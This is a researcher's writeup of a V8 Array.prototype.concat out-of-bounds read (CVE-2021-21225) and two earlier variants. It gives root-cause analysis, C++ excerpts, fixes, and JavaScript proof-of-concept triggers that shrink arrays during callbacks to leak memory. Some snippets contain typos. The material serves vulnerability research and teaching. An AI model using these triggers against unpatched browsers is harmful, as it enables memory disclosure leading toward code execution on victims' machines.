T i s
z k
a

A Bug's Life: CVE-2021-21225

Summary

In this post, I want to showcase CVE-2021-21225, a vulnerability in V8's Array.prototype.concat implementation that I discovered in April 2021. It was used to gain code execution in Google Chrome's renderer process and won a $22000 bounty from Google which was donated to the EFF (matched by Google). The bug itself has quite an interesting history and marks all the checkboxes of a powerful V8 engine vulnerability that comes with V8 builtin bugs: works in pdfium, web workers, and JIT-less environments.

Checking the "grey" markets -- publishing with explicit permission of the buyers -- for this bug and two other bugs (update: crbug.com/1260109 & crbug.com/1307610) the prices for these bugs ranged anywhere from $350k-500k each if provided with a reliable enough exploit that they could work with, with most of the payouts being an upfront bonus of N% with quarterly payouts after contigent on the bugs lasting.


I thought this post would also be a good opportunity to write about a few V8 exploitation techniques that I haven't seen in public exploits (you can find these techniques in Part 2 of this writeup here):
  • 1. How to easily disable JIT W^X at runtime [ref]
  • 2. How to leak the pointer compression isolated root value [ref]
  • 3. How to survive Object::ToNumber(fakeObj)
  • 4. How to write a GC resistant addrOf [ref] with LargeObjectSpace arrays

Ode to Weirdness

V8's Array.prototype.concat's implementation is a complex state machine that has produced a large number of vulnerabilities over the years. Looking at the implementation, it's easy the understand why; the function can take an arbitrary number of arguments and those arguments can be any type. So Array.prototype.concat needs to handle every single edge case that comes with concatenating two "arrays". Here's a call to Array.prototype.concat with only Arrays as input:
var a1 = [1,,3];
a1.__proto__[1] = 2;
var a2 = []; 
var a3 = [6, 5];
a2.length = 1;
a2.__defineGetter__(0, function() { 
    a1[1] = 2; a3.reverse(); return 4;
});
console.log(a1.concat(a2, a3)); // >>> [1, 2, 3, 4, 5, 6]
and it handles all of these cases and more: Symbol.species [ref], Symbol.isConcatSpreadable [ref], "fast" Array types [ref], "Slow" Array types [ref], and other objects that aren't Arrays [ref].

State machines this complex are a common target for security researchers who enjoy reviewing code for vulnerabilities that might be multiple levels of abstractions deep. If you happen to enjoy reading about this style of bug, you might also consider reading these writeups [comex]. However the complexity of the spec which leads to primitives that move state machines into "weirder" states is only half the story. The other variable that security researchers use when evaluating interesting targets is naturally the number of "weirder" states in the state machine. These "weirder" states in V8 are almost always states that lead to memory corruption. Weirdness can compound, one small vulnerability in one state to a "weirder" state can be used to create an even "weirder" which will eventually lead to memory corruption. Hopefully this makes sense by the end of this writeup, but I hope one takeaway is that vulnerability researchers often audit state machines and not only "source" to "sink" (which is obviously a smalle subset).

History

There is a history behind CVE-2021-21225 that tells a tale of how changes to the TC39 standard (the JavaScript spec all major JS engines follow) can cause vulnerabilities in scripting engines [ref: Natalie Silvanovich]. CVE-2021-21225 is an out-of-bounds read vulnerability in Array.prototype.concat that leads to code execution. However, the commit that introduced this vulnerability didn't make any changes to the underlying implementation of Array.prototype.concat.There have been no significant changes to the implementation of Array.prototype.concat in the past five years.

The TC39 spec change that introduced this vulnerability is rather innocuous and simply makes TypedArray elements configurable.



TLDR; this statement no longer throws an exception.
var u32 = new Uint32Array(64);
Object.defineProperty(1, { configurable: true });
You may ask, how did a change this simple to the TypedArray spec cause an out-of-bounds read in Array.prototype.concat? The stars have been aligning to make this vulnerability for over seven years. To understand how it came into existence, it's worth looking at two other snapshots in Chrome's history when triggering this same vulnerability was possible: CVE-2016-1646 and CVE-2017-5030.

Root Cause Analysis: CVE-2016-1646

Within Array.prototype.concat's implementation there is logic that iterates over each element of every object passed to Array.prototype.concat and stores those elements to a final concatenated array. It's one of the largest and most complex builtin functions in the V8 codebase and is all still implemented in C++, so I'll break it up into chunks:

// JavaScript code
var result = [1,2,3].concat([4, 5, 6]); 

----------------------------------------
# C++ implementation of JavaScript code above

/* [1] `visitor` is the object to be returned by concat. 
   `visitor` == `result` variable in JavaScript above   */
ArrayConcatVisitor visitor(isolate, storage, fast_case);
  
// [2] Iterate over every argument, then iterate
// over their elements.
for (int i = 0; i < argument_count; i++) {
  Handle<Object> object = args‑>at(i);
  IterateElements(isolate, object, &visitor))
}
...
1. visitor, the object Array.prototype.concat will be writing all of the elements of the input arrays to and returning is allocated.

2. This forloop iterates over each argument passed to Array.prototype.concat. On each iteration it will pass an argument to IterateElements which will iterate each argument's elements.



bool IterateElements(Isolate* isolate, Handle<JSReceiver> receiver,
                     ArrayConcatVisitor* visitor) {
    // [3]
    Handle<JSObject> array = Handle<JSObject>::cast(receiver);

    // [4]
    int length = static_cast<uint32_t>(array‑>length().Number());

    // [5]
    switch (array->GetElementsKind()) {
    ...
}
3. Store the input array from the arguments into the variable array.
4. Store the length of the input array in the variable length.
5. Checks the Type of the array with GetElementsKind. Arrays can have a few different types that all need to be handled differently. For example, arrays that only hold double elements, [1.1, 2.2, 3.3], will be type FAST_DOUBLE_ELEMENTS.


  // [5]
  switch (array‑>GetElementsKind()) {
    case FAST_DOUBLE_ELEMENTS: {
      // [6]
      Handle<FixedArray> elements(FixedArray::cast(array->elements()));

      // [7]
      int fast_length = static_cast<int>(length);
      
      // [8]
      FOR_WITH_HANDLE_SCOPE(isolate, int, j = 0, j, j < fast_length, j++, {
        ...
      });
  }
6. Cache the Array's elements pointer in the variables elements, which points to the array's contents.
7. Cache the length of the array in fast_length.
8. Iterate from 0..fast_length


    // [8]
    FOR_WITH_HANDLE_SCOPE(isolate, int, j = 0, j, j < fast_length, j++, {
      
      // [9]
      Handle<Object> element_value(elements->get(j), isolate);

      // [10]
      if (!element_value->IsTheHole(isolate)) {
        if (!visitor->visit(j, element_value)) return false;
      } else {
        // [11]
        ASSIGN_RETURN_ON_EXCEPTION_VALUE(
            isolate, element_value,
            JSReceiver::GetElement(isolate, array, j), false);
        if (!visitor->visit(j, element_value)) return false;
      }
    });
9. Read the jth element from the array's contents using elements‑>get(j)
10. If the value read by elements‑>get(j) is not a Hole (i.e. is not empty) store it to the result object with visitor‑>visit.
11. If the value read by elements‑>get(j) is a Hole (i.e. the element is empty [1, 2, /* hole */, 4]) use JSReceiver::GetElement to traverse array's prototype chain in search for a value. Store whatever is found to the result array with visitor‑>visit.


A quick note on how the V8 engine accesses a JavaScript Array's elements: V8 generally has two ways of doing things, slow and fast. The fast-operations access memory directly and the slow-operations use the V8 interpreter itself to access elements using the same underlying APIs that make the JavaScript code var array=[1, , 3]; array[1]; possible. elements‑>get is a fast-operation, i.e. it reads directly from memory and if it reads outside of the array's length, it will cause undefined behavior and return arbitrary memory contents. Whereas JSReceiver::GetElement is a slow-operation, i.e. it will walk up prototype chains [ref], throw exceptions, call getters/setters [ref], return undefined if reading out-of-bounds, and any other behavior you can think of when accessing an index from JavaScript. Let's take a look at that forloop again with this in mind:
    FOR_WITH_HANDLE_SCOPE(isolate, int, j = 0, j, j < fast_length, j++, {
      // [A] fast-operation
      Handle<Object> element_value(elements->get(j), isolate);

      if (!element_value->IsTheHole(isolate)) {
        if (!visitor->visit(j, element_value)) return false;
      } else {
        // [B] slow-operation
        ASSIGN_RETURN_ON_EXCEPTION_VALUE(
            isolate, element_value,
            JSReceiver::GetElement(isolate, array, j), false);
        if (!visitor->visit(j, element_value)) return false;
      }
    });
The issue here is that the JSReceiver::GetElement abstraction not only traverses prototype chains for values but will also trigger getter/setter callbacks if any exist on the prototype chain. Those callbacks can contain user-controlled JavaScript. Meaning that at [B] we can execute any JavaScript we want.

This turns out to not be an ideal state of affairs for the V8 JavaScript engine, especially this forloop. In our malicious callback we can change the length of the array with array.length = 1; and trigger a garbage collection cycle by allocating a lot of memory with new ArrayBuffer(0x7fe00000). During this garbage collection cycle, the array will be re-allocated with elements of length 1. Remember fast_length will still be whatever length the array was when it first entered IterateElements so this forloop will continue running from 0..fast_length even though the elements' length is now 1 and the memory-unsafe operation elements‑>get(j) will read out of bounds and start reading in gibberish values that are in memory after elements or cause a crash. Here's a proof of concept:
// CVE-2016-1646: Credits to [Wen Xu - Keen, Guang Gong - Qihoo360]

// [1] Allocate an array with a hole
var array = [1.1, /* hole where callback will trigger */, 3.3, 4.4];
// [2] Create a custom prototype for the array
var proto = {};
array.__proto__ = proto;

// [3] Define a getter on the array's prototype
proto.__defineGetter__(1, function() {
    array.length = 1; // change the length of the array
    new ArrayBuffer(0x7fe00000); // trigger garbage collection
    return 2.2;
});

// [4] Execute concat and print out the result object
var c = Array.prototype.concat.call(array).
console.log(c); 
// >> [1.1, 2261634.5098039214, 1.0316188778496665e+26, 
       5969818116700211.0]
The final array returned by Array.prototype.concat yields an array with special double values such as 1.0316188778496665e+26. These correspond to pointer values that were read out of bounds with elements->get(j) and stored in the result array with visitor‑>visit.

The Fix

The fix uses the abstraction HasOnlySimpleElements, a function that checks if there are any getters/setters on an object or its prototype chain, to ensure that none of the input arrays will trigger JavaScript execution when JSReceiver::GetElement is called.
+ if ( !HasOnlySimpleElements(isolate, *receiver)) {
+     return IterateElementsSlow(isolate, receiver, length, visitor);
+ }

  switch (array‑>GetElementsKind()) {
      case FAST_DOUBLE_ELEMENTS: {
      ...

Root Cause Analysis: CVE-2017-5030

The crux of the issue that caused CVE-2016-1646 was that callbacks could execute before the memory-unsafe operation elements->get(j) and within those callbacks the length of elements being indexed by elements->get(j) could be modified. So although the vulnerability above was patched by checking the input arrays for getters/setters on the arrays being passed to Array.prototype.concat, if there was a different way to execute callbacks within that forloop then the vulnerability would exist once again. Enter CVE-2017-5030.

A few months after CVE-2016-1646 was fixed there were two major changes to V8: the Proxy object and Symbol.species were introduced. A combination of these two features introduced a new avenue to trigger callbacks within the forloop; this time within visitor‑>visit which stores values to the result object returned by Array.prototype.concat.

Understanding Symbol.species

The first major addition to V8 after CVE-2016-1646 was Symbol.species [ref], introduced in June 2016. Put simply, Symbol.species allows objects to override their default constructor. So JavaScript builtins like Array.protoype.concat and Uint8Array.prototype.slice will now derive the class of the object they are going to return by pulling the Symbol.species symbol from their input object's constructor. I think code speaks louder than words here, so here is an example:
function CustomConstructor() {
    return new Number(5);
}

class MyArray extends Array {
    static get [Symbol.species]() { return CustomConstructor; }
}
                      
var array = (new MyArray(3)).fill(1);
console.log(array); // >>> MyArray(3) [1, 1, 1]
var return_value = array.concat(2);
console.log(return_value); 
// >>> Number {5, 0: 1, 1: 1, 2: 1, 3: 2, length: 4}

What is a Proxy object?

The second addition to V8 was the Proxy object [ref], an object that wraps other objects and intercepts calls to the objects they wrapped. For example, this small script uses a Proxy to intercept all of the get operations to an object.
const handler = {
  get: function(target, prop, receiver) {
    return "evil";
  }
};

var a = new Proxy({}, handler);
a[0] = 5;
console.log(a[0]); // >>> "evil"
console.log(a[2]); // >>> "evil"

The Vulnerability

Let's scatter all of the puzzle pieces out on a table so we can eventually fit them together.

1. Symbol.species can be used to control the object that Array.prototype.concat returns.
2. Array.prototype.concat is still vulnerable if a callback can be triggered in the forloop.
3. The Proxy object can be used to intercept requests to an object.

Piece #1: visitor is now controlled by the user with Symbol.species

After the addition of Symbol.species in 2016, Array.prototype.concat now reads the constructor in Array[@@species] from its first argument to construct the object it's going to return.
  // [1] Read Symbol.species symbol from the first argument 
  Handle<Object> species;
  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, species, Object::ArraySpeciesConstructor(isolate, receiver));
  ...

  Handle<Object> length(Smi::zero(), isolate);
  Handle<Object> storage_object;
  // [2] Execution::New calls a function from the JS Engine
  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
     isolate, storage_object,
     Execution::New(isolate, species, species, 1, &length));
  storage = Handle<HeapObject>::cast(storage_object);
  
  // [3]
  ArrayConcatVisitor visitor(isolate, storage, fast_case);
  ...
Array.prototype.concat now uses Symbol.species [1] to pull the constructor from its first argument. Then executes that constructor [2], stores the result in storage variable, and creates the visitor object with the storage variable.

Meaning that we have complete control over the object that Array.prototype.concat writes to with visitor->visit and returns:
var o = {};
class MyArray extends Array {
    static get [Symbol.species]() {
        return function() { return o; }
    }; 
}
var a = new MyArray();
console.log(Array.prototype.concat.call(a, [1, 2, 3])); 
// >>> {0: 1, 1: 2, 2: 3, length: 3}

console.log(o); 
// >>> {0: 1, 1: 2, 2: 3, length: 3}

Piece #2

Now that the visitor object is completely under our control, there is an opportunity to find instances where writing to the visitor object results in a callback running. Here is a snippet of code from the visitor‑>visit.
V8_WARN_UNUSED_RESULT bool visit(uint32_t i, Handle<Object> elm) {
  uint32_t index = index_offset_ + i;
  ...

  if (!is_fixed_array()) {
    LookupIterator it(isolate_, storage, index, LookupIterator::OWN);
    // [1]
    MAYBE_RETURN(
      JSReceiver::CreateDataProperty(&it, elm, Just(kThrowOnError)), false);
    return true;
  }
    ...
}
Under the covers, visitor‑>visit is using the JSReceiver::CreateDataProperty abstraction [1] to write values from the input arrays to the result object Array.prototype.concat is going to return.

Let's have a look of JSReceiver::CreateDataProperty's callgraph:


If any of these functions that JSReceiver::CreateDataProperty calls can trigger a JavaScript callback, we can exploit it in the same way that we did in CVE-2016-1646. I can't walk through every one of these functions in this post, but looking closer we can see that there are JSProxy paths, meaning Proxy objects are handled by CreateDataProperty.

Piece #3

Taking a closer look at the call graph we see that CreateDataProperty will eventually reach the function JSProxy::DefineOwnProperty if passed a Proxy object.
Maybe<bool> JSProxy::DefineOwnProperty(Isolate* isolate, Handle<JSProxy> proxy,
                                       ...) {
  ...
  // [1]
  Handle<Object> trap;
  ASSIGN_RETURN_ON_EXCEPTION_VALUE(
      isolate, trap,
      Object::GetMethod(Handle<JSReceiver>::cast(handler), "defineProperty"),
      Nothing<bool>());
  ...
JSProxy::DefineOwnProperty looks up the "defineProperty" string on the Proxy's handler with Object::GetMethod [1]. Object::GetMethod is a slow-operation, like JSReceiver::GetElement, that will trigger getter/setter callbacks. Meaning that we can once again execute a callback within the IterateElements forloop in Array.prototype.concat.

Putting it all together

// Page 1/3 
// [1] Create a Proxy Object
var target = {};
var handler = {};
var p = new Proxy(target, handler);

// [2] return the Proxy object from Symbol.species
class MyArray extends Array {
    static get [Symbol.species]() {
        return function() { return p; }
    };
}

// [3] Instantiate our new array class
var w = var MyArray(100);
w[1] = 0.1;
w[2] = 0.1;
First, we must create an object with a custom Symbol.species that returns a Proxy object [2].


// Page 2/3 
var b_dp = o.defineProperty;
function evil_callback() {
    // [4]
    w.length = 1; // shorten the array
    gc();         // trigger gc
    return b_dp;
}
// [5]
handler.__defineGetter__("defineProperty", evil_callback);
Then we must define a getter for the string "defineProperty" on its handler [5] which will be executed when Object::GetMethod is called deep in visitor->visit. Within that getter we will shorten the length of an input array with a.length = 1 and trigger garbage collection [4].


// Page 3/3 
// [6]
var result = Array.prototype.concat.call(w);

// [7]
for (var i = 0; i < 20; i++) {
  console.log(result[i]); 
}
/*
0.1
4.763608295640895e-270
1.1162362362175e-311
1.9058130679254088e-269
4.763796148908345e-270
1.6371943681747382e-269
6.0095139738375e-309
1.9352160739915938e-269
4.7637961505155866e-270
*/

Finally, we trigger Array.prototype.concat with our custom object as the first argument [6]. After it's done executing we can read the OOB values from the result object [7].

Here's all of that in one go:
// [1] Create a Proxy Object
var target = {};
var handler = {};
var p = new Proxy(target, handler);

// [2] return the Proxy object from Symbol.species
class MyArray extends Array {
    static get [Symbol.species]() {
        return function() { return p; }
    };
}

// [3] Instantiate our new array class
var w = new MyArray(100);
w[1] = 0.1;
w[2] = 0.1;

// [4]
var b_dp = o.defineProperty;
function evil_callback() {
    // [5]
    w.length = 1; // shorten the array
    gc();         // trigger gc
    return b_dp;
}
handler.__defineGetter__("defineProperty", evil_callback);

// [6]
var result = Array.prototype.concat.call(w);

// [7]
var (var i = 0; i < 20; i++) {
  console.log(result[i]); 
}

The Fix

The fix adds a second check guaranteeing that the result object (the object returned by Symbol.species) is a "Simple" type. Simply put, this check ensures that the result object is not a Proxy object with the hope that this prevents callbacks from being executed within the IterateElements forloop.
+   if (!visitor‑>has_simple_elements() ||
       !HasOnlySimpleElements(isolate, *receiver)) {
     return IterateElementsSlow(isolate, receiver, length, visitor);
   }
   Handle<JSObject> array = Handle<JSObject>::cast(receiver);

   switch (array‑>GetElementsKind()) {
     case PACKED_SMI_ELEMENTS:
     case PACKED_ELEMENTS:
     case PACKED_FROZEN_ELEMENTS:
     case HOLEY_ELEMENTS: {

Root Cause Analysis: CVE-2021-21225

Now going back to the TC39 change that introduced CVE-2021-21225 and what it does.


From a web developer's perspective this means that it's possible to define configurable properties to TypedArrays:
var u32 = new Uint32Array(64);
Object.defineProperty(1, { configurable: true });
From a V8 scripting engine perspective this means that CreateDataProperty(typedArray, 0, 5) is now possible. Before this patch, when CreateDataProperty was passed a TypedArray it would throw an exception because TypedArray elements were not configurable.
VM133:1 Uncaught TypeError: Cannot redefine property: 0
    at :1:3
But with this new TC39 change it's possible. With this new attack surface in mind, let's look back at the attack surface diagram for JSReceiver::CreateDataProperty we see some references to TypedArrays. Maybe we can trigger a callback in there somewhere.


Seven functions deep in CreateDataProperty there is a call to the function Object::SetDataProperty.
Maybe<bool> Object::SetDataProperty(LookupIterator* it, Handle<Object> value) {
  ...
  // [1] if the receiver is a TypedArray
  if (it->IsElement() && receiver->IsJSObject(isolate) &&
      JSObject::cast(*receiver).HasTypedArrayElements(isolate)) {
    ElementsKind elements_kind = JSObject::cast(*receiver).GetElementsKind();
    // [2]
    if (elements_kind == BIGINT64_ELEMENTS ||
        elements_kind == BIGUINT64_ELEMENTS) {
      // [3] convert the value to be stored to a BigInt before storing
      ASSIGN_RETURN_ON_EXCEPTION_VALUE(isolate, to_assign,
                                       BigInt::FromObject(isolate, value),
                                       Nothing<bool>());
      ...
    // [4]
    } else if (!value->IsNumber() && !value->IsUndefined(isolate)) {
      // [5]
      ASSIGN_RETURN_ON_EXCEPTION_VALUE(isolate, to_assign,
                                       Object::ToNumber(isolate, value),
                                       Nothing<bool>());
      ...
    }
  }
  ...
}
Within Object::SetDataProperty there is logic to check if the object being stored to is a TypedArray [1], then if the object is a TypedArray it converts the value being stored to the object from an Object type to a numeric type ([3] for bigints, [5] for regular numbers).

As it turns out converting from an Object to a Number in JavaScript triggers a callback.
var object = { valueOf: function() {
    console.log("callback!")
    return 5;
}};
var sum = object + 4; // Convert from Object => Integer
// >>> callback!
console.log(sum);
// >>> 9

Putting it all together again

// [1] Create a TypedArray Object
let u32 = new Uint32Array(32);
u32.__defineSetter__('length', function() {});

// [2] return the TypedArray object from Symbol.species
class MyArray extends Array {
    static get [Symbol.species]() {
        return function() { return u32; }
    }; 
}

// [3] Instantiate our new array class
var w = new MyArray(100);
First, we must create an object with a custom Symbol.species that returns a TypedArray object u32 [2].

// [4] create a valueOf callback
w[1] = {
  valueOf: function() { 
    w.length = 1; // change the length
    gc(); // trigger garbage collection
    return 1;
  }
};
w[2] = 2;
Then we store an object with a valueOf callback [4] to the array so it will be written to the resulting TypedArray u32 with visitor->visit causing the valueOf callback will run during visitor->visit.

// [5] trigger array.concat
var c = Array.prototype.concat.call(w);
Then of course we trigger Array.prototype.concat with w as the first argument [5].

// [1] Create a TypedArray Object
let u32 = new Uint32Array(32);
u32.__defineSetter__('length', function() {});

// [2] return the TypedArray object from Symbol.species
class MyArray extends Array {
    static get [Symbol.species]() {
        // [1] return a TypedArray
        return function() { return u32; }
    }; 
}

// [3] Instantiate our new array class
var w = new MyArray(100);

// [4] create a valueOf callback
w[1] = {
  valueOf: function() { 
    w.length = 1; // change the length
    gc(); // trigger garbage collection
    return 1;
  }
};

// [5] trigger array.concat
var c = Array.prototype.concat.call(w);

The Final Fix

The fix this time adds the scope level abstraction DisallowJavascriptExecution to the scope of the forloop.



DisallowJavascriptExecution is a special function that will crash the V8 runtime with an assertion if JavaScript is ever executed in its scope. Meaning that if a callback is ever triggered in the IterateElements forloop again the program will crash with a benign assertion. This bug is truly dead.

Security Engineering Lessons

V8's implementation of Array.prototype.concat has fascinated me for years, CVE-2017-5030 was the first browser vulnerability I ever discovered and I came across CVE-2021-21225 four years later. What captivated me was the very weak security invariant that guarded it: "this function is not vulnerable if and only if callbacks can't be triggered while the input arrays are being processed".

Lesson: Manage Abstraction Complexity and Harden Security Invariants

Looking back, the only reason CVE-2016-1646 ever existed was the developer needed an abstraction that searched an object's prototype chain for a value and the only abstraction available with that functionality was JSReceiver::GetElement.

JSReceiver::GetElement hid tons and tons of complexity, like any good abstraction, but some of that hidden complexity, like calling getters/setters, had the potential to break security invariants. Identify these abstractions that hide tons of complexity and audit them for paths that can break security invariants. Then audit and harden the callers of those abstractions.

Exploitation

Exploitation is covered in Part 2 of the writeup